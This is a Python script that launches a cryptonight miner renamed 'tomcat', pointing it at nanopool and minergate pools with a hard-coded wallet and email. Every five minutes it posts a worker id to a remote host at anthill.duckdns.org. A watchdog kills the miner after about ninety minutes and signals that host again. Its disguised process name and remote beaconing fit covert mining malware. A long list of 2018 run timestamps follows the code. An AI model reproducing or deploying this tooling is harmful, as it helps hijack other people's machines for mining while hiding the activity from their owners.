import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:50:09.622655
#2018-02-17 16:31:01.843221
#2018-02-17 18:19:04.955716
#2018-02-17 20:06:05.861747
#2018-02-17 21:53:04.466272
#2018-02-17 23:38:07.744539
#2018-02-18 01:27:07.088239
#2018-02-18 03:14:07.655957
#2018-02-18 05:03:01.741079
#2018-02-18 06:53:07.157181
#2018-02-18 08:41:05.545702
#2018-02-18 10:27:02.068251
#2018-02-18 12:13:05.617713
#2018-02-18 13:59:03.287453
#2018-02-18 15:48:07.376816
#2018-02-18 17:37:01.836863
#2018-02-18 19:25:02.686823
#2018-02-18 21:10:01.233654
#2018-02-18 22:56:07.617067
#2018-02-19 00:45:06.493266
#2018-02-19 02:32:04.566902
#2018-02-19 04:18:06.742736
#2018-02-19 06:03:07.209503
#2018-02-19 07:51:01.762875
#2018-02-19 09:41:08.354051
#2018-02-19 11:32:07.709879
#2018-02-19 13:18:08.381138
#2018-02-19 15:07:08.008509
#2018-02-19 16:54:04.532022
#2018-02-19 18:41:01.664851
#2018-02-19 20:28:06.169902
#2018-02-19 22:15:09.547412
#2018-02-20 00:02:01.663780
#2018-02-20 01:48:06.123907
#2018-02-20 03:37:05.878115
#2018-02-20 05:24:04.764895
#2018-02-20 07:08:07.666644
#2018-02-20 08:54:06.967199
#2018-02-20 10:38:06.576521
#2018-02-20 12:24:01.707906
#2018-02-20 14:11:04.851269
#2018-02-20 15:54:06.617733
#2018-02-20 17:41:02.209276
#2018-02-20 19:29:01.764485
#2018-02-20 21:17:03.654818
#2018-02-20 23:02:01.475142
#2018-02-21 00:46:07.936454
#2018-02-21 02:32:04.045776
#2018-02-21 04:18:07.193957
#2018-02-21 06:06:06.545705
#2018-02-21 07:52:07.059200
#2018-02-21 09:36:06.083901
#2018-02-21 11:24:04.778103
#2018-02-21 13:12:09.095899
#2018-02-21 14:59:11.435071
#2018-02-21 16:47:10.847373
#2018-02-21 18:39:06.200658
#2018-02-21 20:24:07.903463
#2018-02-21 22:11:07.176878
#2018-02-22 00:01:07.602660
#2018-02-22 01:50:02.013119
#2018-02-22 03:36:02.250838
#2018-02-22 05:22:05.038196
#2018-02-22 07:06:06.394217
#2018-02-22 08:53:08.044167
#2018-02-22 10:41:01.569010
#2018-02-22 12:26:09.138162
#2018-02-22 14:12:02.228110
#2018-02-22 15:59:05.047520
#2018-02-22 17:46:10.753404
#2018-02-22 19:33:09.123100
#2018-02-22 21:25:09.456063
#2018-02-22 23:12:02.040341
#2018-02-23 00:59:06.832409
#2018-02-23 02:48:07.609108
#2018-02-23 04:32:06.754983
#2018-02-23 06:18:07.826537
#2018-02-23 08:05:05.937486
#2018-02-23 10:22:01.937173
#2018-02-23 12:17:06.558826
#2018-02-23 14:04:05.995370
#2018-02-23 15:54:07.992673
#2018-02-23 17:38:09.416749
#2018-02-23 19:24:02.211991
#2018-02-23 21:09:06.791765
#2018-02-23 22:53:07.052057
#2018-02-24 00:41:06.263661
#2018-02-24 02:32:04.979149
#2018-02-24 04:25:08.217001
#2018-02-24 06:12:05.872668
#2018-02-24 07:59:01.699063
#2018-02-24 09:43:04.224754
#2018-02-24 11:38:01.772638
#2018-02-24 13:28:04.445852
#2018-02-24 15:16:07.731459
#2018-02-24 17:07:05.486967
#2018-02-24 18:59:02.109785
#2018-02-24 20:45:09.364044
#2018-02-24 22:59:07.067036
#2018-02-25 02:17:06.169108
#2018-02-25 06:03:04.092264
#2018-02-25 11:39:01.937111